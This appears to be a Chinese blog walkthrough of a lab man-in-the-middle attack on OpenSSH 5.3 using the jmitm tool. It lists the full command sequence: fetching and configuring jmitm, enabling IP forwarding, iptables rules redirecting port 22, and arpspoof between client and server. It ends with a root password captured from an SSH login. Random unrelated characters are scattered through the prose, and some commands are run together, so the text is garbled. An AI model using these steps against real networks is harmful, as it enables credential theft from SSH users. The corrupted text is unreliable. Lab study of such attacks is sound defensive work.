? ? ? ? 利用Jmitm對OpenSSH2.0版本進(jìn)行中間人攻擊中間人攻擊
準(zhǔn)備三臺linux虛擬機(jī)狂鞋,除了中間人機(jī)器(10.10.19.136)外的另外兩臺虛擬機(jī)的openSSH需要重新下載openSSH5.3此類較早前的版本源碼并編譯绘面,安裝成功后測試openSSH服務(wù)是否開啟成功右蕊。
CenOS查看指令systemctl status service
在中間人機(jī)器(10.10.19.136)上下載jmitm軟件并解壓:
wgethttp://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz? #下載
tar xfjmitm2-0.1.0.tar.gz?? #解壓
對該工具進(jìn)行配置星虹,編輯jmitm軟件中的server.xml(/jmitm2-0.1.0/conf/server.xml)配置文件:
對該工具進(jìn)行配置不从,編輯jmitm軟件中的runm.sh(/jmitm2-0.1.0/bin/runm.sh)配置文件:
運(yùn)行/jmitm2-0.1.0/bin目錄下的runm.sh程序马昨,開始監(jiān)聽連接:
./runm.sh
客戶端10.10.19.189? ??服務(wù)端????10.10.19.178???中間人 10.10.19.136
依次運(yùn)行以下命令:
echo 1 >
/proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING
-p tcp --dport 22 -j REDIRECT
iptables -A FORWARD
-j ACCEPT
arpspoof -i eth0 -t 10.10.19.189(客戶端IP)10.10.19.178(服務(wù)端IP)
在ssh客戶端10.10.19.189登錄ssh服務(wù)端10.10.19.178并輸入密碼*********
查看運(yùn)行的程序runm.sh所輸出的內(nèi)容中掷酗,發(fā)現(xiàn)成功捕獲到用戶名(root)/密碼(*********):